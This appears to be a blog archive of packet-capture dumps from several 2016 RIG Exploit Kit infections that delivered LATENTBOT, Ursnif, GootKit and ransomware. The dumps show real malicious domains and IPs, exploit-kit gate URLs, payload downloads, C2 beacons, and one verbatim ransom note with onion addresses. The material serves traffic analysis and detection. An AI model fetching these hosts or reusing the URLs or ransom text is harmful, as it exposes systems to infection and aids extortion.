Exploit Kits | The Place For PCAPs

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

Posted on October 28, 2016 by admin

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@…”m..
.6……P…S….P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1…6…..
—
..R.4…P.X{./k..P.@[&i……..
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E…Kl@…gf..
..R.4…P.X{./k..P.@[.’..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0
—
..R.4…P.X}./k..P.?[.x……..
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E…L4@…e…
..R.4…P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E…MH@…e…
..R.4…P.X.T/l..P.@U!…GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:….R.4..
..P../l…X..P. …..
—
….l.%.P~…..+@P.@[……….
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…N.@…RD..
….l.%.P~…..+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv…l..
..P.%..+@~…P..0….HTTP/1.1 200 OK
CONTENT-LENGTH: 0
—
….l.%.P~…..+fP.@Q……….
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@…P…
….l.%.P~…..+fP.@Qw…GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ…l..
..P.&.t.v…%P…….HTTP/1.1 200 OK
CONTENT-TYPE: application/zip
—
….l.(.P……..P.@[B………
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@…Q…
….l.(.P……..P.@[….GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD…l..
..P.(……..P…….HTTP/1.1 200 OK
—
R..N…P.@[.\……..
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…O8@…Q…
….l.*.P
R..N…P.@[K…GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

….l.4…U….M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM…l..
….4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E…V.@…JT..
….l.3…..]…6P.=.M…POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T….l..
….3…6….P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x
—
E…V.@…JR..
….l.3………mP.=…..POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

Quant loader Ursnif malware from RIG Exploit Kit EK PCAP file download Traffic Analysis Sample

Posted on October 28, 2016 by admin

2016-10-25 11:46:51.191792 IP 192.168.2.50.49192 > 192.232.206.125.80: Flags [P.], seq 1:249, ack 1, win 16537, length 248: HTTP: GET / HTTP/1.1
E.. ..@……..2…}.(.P…..J..P.@.u=..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: scadradio.org
Connection: Keep-Alive

2016-10-25 11:46:51.364390 IP 192.232.206.125.80 > 192.168.2.50.49192: Flags [.], ack 249, win 123, length 0
E..(H.@.8……}…2.P.(.J……P..{….
—
.@……..2..oR.;.P…..m.YP.@.:G……..
2016-10-25 11:46:56.365015 IP 192.168.2.50.49211 > 176.223.111.82.80: Flags [P.], seq 1:458, ack 1, win 16537, length 457: HTTP: GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
E…
.@… ….2..oR.;.P…..m.YP.@…..GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://scadradio.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: po1289k.kremalopsi.gq
Connection: Keep-Alive

2016-10-25 11:47:23.483901 IP 192.168.2.50.49228 > 104.238.131.117.80: Flags [P.], seq 1:341, ack 1, win 16537, length 340: HTTP: GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
E..|..@…;&…2h..u.L.P.s9..0.lP.@.>…GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: loremipsumdolorsitamet.pw
Connection: Keep-Alive

2016-10-25 11:47:23.601685 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [.], ack 341, win 980, length 0
E..(.M@.8..?h..u…2.P.L.0.l.s:.P…c1..
2016-10-25 11:47:23.854582 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [P.], seq 1:347, ack 341, win 980, length 346: HTTP: HTTP/1.1 200 OK
—
E..(..@…’f…2R….M.P.t…..oP.@………..
2016-10-25 11:47:24.271842 IP 192.168.2.50.49229 > 82.165.174.205.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /img/381m6bv285.exe HTTP/1.1
E..]..@…&0…2R….M.P.t…..oP.@…..GET /img/381m6bv285.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: institut-angeetbeaute.fr
Connection: Keep-Alive

2016-10-25 11:47:24.484048 IP 82.165.174.205.80 > 192.168.2.50.49229: Flags [.], seq 1:1351, ack 310, win 516, length 1350: HTTP: HTTP/1.1 200 OK
E..nw\@.v…R……2.P.M…o.t..P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
—
!@.-.yJ…….2.P.N..’..C.YP.r..7..
2016-10-25 11:48:01.761117 IP 192.168.2.50.49230 > 46.30.215.31.80: Flags [P.], seq 1:110, ack 1, win 64800, length 109: HTTP: GET /micha/fsa/zj47dn49.iso HTTP/1.1
E….*@…”….2…..N.P.C.Y..’.P.. ….GET /micha/fsa/zj47dn49.iso HTTP/1.1
Host: gingapura.de
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 11:48:01.941251 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], ack 110, win 29200, length 0
EH.(.2@.-..8…….2.P.N..’..C..P.r…..
2016-10-25 11:48:01.942021 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], seq 1:1301, ack 110, win 29200, length 1300: HTTP: HTTP/1.1 200 OK
EH.<.3@.-..#…….2.P.N..’..C..P.r..K..HTTP/1.1 200 OK
Date: Tue, 25 Oct 2016 13:17:15 GMT
—
E..(.}@….)…2%0z..R.P..^.k.wpP.@.P………
2016-10-25 11:48:21.713804 IP 192.168.2.50.49234 > 37.48.122.26.80: Flags [P.], seq 1:178, ack 1, win 16537, length 177: HTTP: GET / HTTP/1.1
E….~@….w…2%0z..R.P..^.k.wpP.@.XF..GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0.0) Gecko/20100101 Firefox/40.0.0
Host: curlmyip.net
Connection: Keep-Alive
Cache-Control: no-cache

RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

Posted on September 29, 2016 by admin

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site

GootKit Banking Trojan Malware Delivered by RIG Exploit Kit EK PCAP file download traffic sample

Posted on September 29, 2016 by admin

2016-09-21 10:01:56.988869 IP 192.168.1.7.49212 > 31.184.193.179.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: G
ET / HTTP/1.1
E..A._@…N……….<.P…’.iR.P.@…..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive

2016-09-21 10:01:57.203904 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], ack 282, win 123, length 0
E..(“.@.8.y……….P.<.iR….@P..{L…
2016-09-21 10:01:57.204021 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], seq 1:1351, ack 282, win 123, length 1350: HTTP: HTTP/1.1 200 OK
E..n”.@.8.tK………P.<.iR….@P..{….HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash

CWS ….x..X.t.Wy.;..}IZ..lKv…cg.Z….Md=-[.-…@3wfvf……>p..&MCC.&!..K.B mHiB.@.=….9=X.=..-$”..!P(m..V..!i…………

2016-09-21 10:02:01.948239 IP 192.168.1.7.49215 > 185.117.73.233.80: Flags [P.], seq 1118:1555, ack 27790, win 16269, length 437: HTTP: GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
E…..@…*……uI..?.P…..3..P.?…..GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive

2016-09-21 10:02:02.152809 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], ack 1555, win 515, length 0
E..(..@.5….uI……P.?.3……P….J..
2016-09-21 10:02:04.257191 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], seq 27790:29140, ack 1555, win 515, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.5….uI……P.?.3……P…m…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes

2016-09-21 10:02:09.452597 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [S.], seq 1684872271, ack 3876680400, win 29200, options [mss 1350,nop,wscale 7,nop,nop,sackOK], length 0
E..4..@.-.S.xr.1…..P.Ddm.O..r…r.o……F……..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167352 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [P.], seq 1:1299, ack 124, win 229, length 1298: HTTP
E..:..@.-…xr.1…..P.Ddm.P..sKP….{……Y…U..W…..i.q.*.3..J{Y…..n…`…V x.J….x..x).3:&G9……u…V..j………………….V…R..O..L0..H0..0. …_z…@0..    *.H……..0f1.0        ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0…160825192527Z..260823192527Z0f1.0 ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0..”0..        *.H………….0..
……<.._Qm..!….%Q.K..!..o.[4…..a)S….|…X…Y:%………..c…\.l..Z’…….5……..E.
………@.v.eux……..}3&>….M.(…….^c..s..x.a…….UVH…x.
…&..f<…..:…….F…,.#…..L……>8.mi..!….2….s..cF`..H….D…^e\…?L..1…’…..s…….0..       *.H………….4…….0…..-6.,…nY.?1…Jy…….)…sURl..9V(h…A..V….)%……{>…*9….).l…r…H……..g.Nf…).4…V..)….6~….(.TT.Acy.>2.v…..[.I.Mk..%-…………….*.K]p..w. @….#……+..\u……………V..Kx-….s..w…..m..fT…7……$/.v..8t….K…G…A………..Q6…e._…W……v……(.}.l.*S..F5.. Z:.c….W.;……..S..B.!2.}..*..Q.d………..c.m=. .>…Y2..!l.35d.#..mK..R5b……..0,_8..$+…0…G.<^..f…..VWN…%..’..!.-*……<{.ZP!.I..:?c. ..&,.\……s..}nM.6<…=.#….Y…;..!…r.B0x…2..H.&..!.
~.O*..!U6.k…H…..    !!..5m=~5..”.+.e…..>…o.T.`\….2…………

RIG Exploit Kit EK Delivers Ransomware Variant CryptFile2 Malware C2 PCAP file download

Posted on September 29, 2016 by admin

2016-09-19 09:49:33.246002 IP 192.168.4.57.49469 > 192.185.52.124.80: Flags [P.], seq 1:303, ack 1, win 16537, length 302: HTTP: GET / HTTP/1.1
E..V4 @….k…9..4|.=.P’…….P.@..F..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: photos2tile.com
Connection: Keep-Alive
Cookie: PHPSESSID=11621c75d998a91f4a371effa2d932a8

—
2016-09-19 09:49:40.123529 IP 192.168.4.57.49490 > 31.184.193.187.80: Flags [.], ack 1, win 16537, length 0
E..(D.@……..9…..R.P.U/~.I..P.@………..
2016-09-19 09:49:40.123610 IP 192.168.4.57.49491 > 31.184.193.187.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..AD.@……..9…..S.P…….ZP.@.p<..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://photos2tile.com/
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.autogrs.party
Connection: Keep-Alive

2016-09-19 09:49:43.630996 IP 192.168.4.57.49493 > 109.234.36.38.80: Flags [P.], seq 1155:1604, ack 27918, win 16265, length 449: HTTP: GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
E…NF@…S….9m.$&.U.Pt…….P.?.A…GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: add.arielcatering.com
Connection: Keep-Alive

2016-09-19 09:49:43.816016 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], ack 1604, win 258, length 0
E..(S.@.8…m.$&…9.P.U….t…P…V…
2016-09-19 09:49:44.884404 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], seq 27918:29268, ack 1604, win 258, length 1350: HTTP: HTTP/1.1 200 OK
